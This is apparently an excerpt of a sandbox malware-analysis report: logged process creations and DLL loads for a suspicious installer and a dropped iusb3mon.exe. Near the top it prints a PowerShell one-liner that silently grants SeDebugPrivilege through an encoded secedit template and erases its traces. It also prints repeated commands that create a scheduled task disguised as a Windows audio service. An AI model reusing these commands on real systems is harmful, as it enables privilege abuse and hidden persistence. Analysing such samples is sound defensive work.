                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Lets-x64.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: lua5.1.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: oledlg.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: actxprxy.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
